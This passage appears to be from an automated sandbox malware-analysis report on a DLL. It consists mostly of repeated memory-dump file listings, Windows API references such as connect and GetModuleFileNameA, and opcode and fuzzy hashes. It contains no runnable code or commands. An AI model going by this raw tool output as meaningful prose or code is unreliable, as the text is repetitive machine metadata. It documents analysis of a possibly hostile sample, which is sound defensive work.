                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CompareExchangeH_prologInterlocked
                              • String ID:
                              • API String ID: 3260258793-0
                              • Opcode ID: 06a62b2b3b121edeaad35dc6bfcdd5cae5ff76ec40c3bd752f7d3670c6792d36
                              • Instruction ID: f3d45348f9458797139b19f795800e651fd1ed1c3752190c8307565a11cda2f1
                              • Opcode Fuzzy Hash: 06a62b2b3b121edeaad35dc6bfcdd5cae5ff76ec40c3bd752f7d3670c6792d36
                              • Instruction Fuzzy Hash: 4701A2B2104306AFC700DF64D9468E6FBBCEF40278B20072EA579936D0EB30A91CC6A1
                              APIs
                              • GetModuleFileNameA.KERNELBASE ref: 6CF5B4A6
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileModuleName
                              • String ID:
                              • API String ID: 514040917-0
                              • Opcode ID: b836bb7c5f2a8480d96154ab61e957d100f009461536030a4e280d051c23aecb
                              • Instruction ID: 86b9d77d441d55befd0a06f1421f3335ba8511c7cf194ba20c72f8dcdb4cf03b
                              • Opcode Fuzzy Hash: b836bb7c5f2a8480d96154ab61e957d100f009461536030a4e280d051c23aecb
                              • Instruction Fuzzy Hash: F5F0A0B15087928ECB54AF7CC081099BBF0FB1A360B510D6CC4C1DB656E73091D9CF52
                              APIs
                                • Part of subcall function 6CECE3AA: __getptd_noexit.LIBCMT ref: 6CECE3AB
                                • Part of subcall function 6CECE3AA: __amsg_exit.LIBCMT ref: 6CECE3B8
                                • Part of subcall function 6CECBBE6: __getptd_noexit.LIBCMT ref: 6CECBBEA
                                • Part of subcall function 6CECBBE6: __freeptd.LIBCMT ref: 6CECBC04
                                • Part of subcall function 6CECBBE6: ExitThread.KERNEL32 ref: 6CECBC0D
                              • __XcptFilter.LIBCMT ref: 6CECBBD2
                                • Part of subcall function 6CED14E4: __getptd_noexit.LIBCMT ref: 6CED14E8
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd
                              • String ID:
                              • API String ID: 1400385479-0
                              • Opcode ID: 43cea91efbea7abd4054008bcf718a1d0f73310909024db42749d371c6c93f10
                              • Instruction ID: 1eeed97dad3817319d1a2db4c350e6a048875638fd404a7eac74cbb5f228a6b0
                              • Opcode Fuzzy Hash: 43cea91efbea7abd4054008bcf718a1d0f73310909024db42749d371c6c93f10
                              • Instruction Fuzzy Hash: E1E08CB59046009FEB189BE0C904EAD3774AF04215F30004CE002AB761CB34AC44DB21
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CEDF34A
                                • Part of subcall function 6CEB2D13: __EH_prolog.LIBCMT ref: 6CEB2D18
                                • Part of subcall function 6CEB2D13: DeleteCriticalSection.KERNEL32(?,?,?,?,6CEB2CF9,00000000,?,?,6CEB9994), ref: 6CEB2D5B
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: H_prolog$CriticalDeleteSection
                              • String ID:
                              • API String ID: 2647045519-0
                              • Opcode ID: bf440ab12c8a436bb418e0076f6fc2a1f28024c422a5f6a77aa015ed7ebb9d0f
                              • Instruction ID: 48e35908b9c353619a05365dee94f98ba10e7679ff865bb5bac016a5893164f6
                              • Opcode Fuzzy Hash: bf440ab12c8a436bb418e0076f6fc2a1f28024c422a5f6a77aa015ed7ebb9d0f
                              • Instruction Fuzzy Hash: ADE0C278A016898BCB28CFA0D1553BCB334EF80629F32035C942617F80CB399A018641
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: 21140438c91f23f86292b14838cf696f13b5a2f0b3e823092ad57d29e842c181
                              • Instruction ID: a4f8ae782e5ffe8cc89c0f416e00e397ac62eeb1638065b862c452f6a786ac2a
                              • Opcode Fuzzy Hash: 21140438c91f23f86292b14838cf696f13b5a2f0b3e823092ad57d29e842c181
                              • Instruction Fuzzy Hash: E7C0CAB268CA10DBC3042F0995C481AFAF9FA4AB00F42481DA0C983200C3710940AB92
                              APIs
                              • connect.WS2_32(6CEF14BC,6CEB83FF,?), ref: 6CEBE8F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: connect
                              • String ID:
                              • API String ID: 1959786783-0
                              • Opcode ID: 7804bd7f03ba094e5d413028bdfa09c8e64e023b149d2c3c5aef1abbc6c13a9f
                              • Instruction ID: 53a7b4fcad2efbfb00978f7f877d3751d5c3435d00783792e9a6c88562333da0
                              • Opcode Fuzzy Hash: 7804bd7f03ba094e5d413028bdfa09c8e64e023b149d2c3c5aef1abbc6c13a9f
                              • Instruction Fuzzy Hash: 39B0923204024EFBCF025FC1EC0489A3F3AFF09264F044014FA19040208B339830AB95
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
